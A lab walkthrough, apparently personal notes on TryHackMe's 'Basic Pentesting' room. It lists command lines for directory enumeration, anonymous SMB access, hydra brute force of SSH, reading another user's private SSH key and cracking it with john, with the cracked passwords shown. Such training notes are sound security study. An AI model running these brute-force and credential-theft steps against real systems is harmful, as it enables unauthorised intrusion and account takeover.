Ex-iT's Notes

Ex-iT's Notes

Basic Pentesting

tryhackme
Basic Pentesting

ENUM

bash
- gobuster dir -u http://10.10.108.101/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x md,txt -t 30 -o gobust_root.txt
    /development
        - dev.txt -> struts / REST v2.5.12 (https://www.exploit-db.com/exploits/42627 ?)
        - j.txt -> J has a weak password

SMB

plaintext
- smbclient -U '' //10.10.108.101/Anonymous
- get staff.txt
    users:
    Jan
    Kay

SSH

plaintext
- crackmapexec ssh 10.10.108.101 -u jan -p /usr/share/wordlists/rockyou.txt
OR:
- hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.108.101 -t 4 ssh
[22][ssh] host: 10.10.108.101   login: jan   password: armando

PRIVESC

plaintext
- cat /home/kay/.ssh/id_rsa -> kay_id_rsa
- python /usr/share/john/ssh2john.py kay_id_rsa > kay_id_rsa.hash
- john --wordlist=/usr/share/wordlists/rockyou.txt kay_id_rsa.hash
    beeswax

SSH to get pass.bak

plaintext
cat /home/kay/pass.bak -> heresareallystrongpasswordthatfollowsthepasswordpolicy$$